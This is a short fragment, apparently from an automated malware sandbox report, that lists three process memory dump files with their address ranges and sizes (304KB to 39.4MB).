                                                                                                                                                                                                                                                                                                                                                                  • memory/6396-3233-0x0000000069ED0000-0x0000000069FCB000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                    1004KB

                                                                                                                                                                                                                                                                                                                                                                  • memory/6676-3155-0x000000006B140000-0x000000006B18C000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                    304KB

                                                                                                                                                                                                                                                                                                                                                                  • memory/6700-3240-0x0000000000400000-0x0000000002B64000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                    39.4MB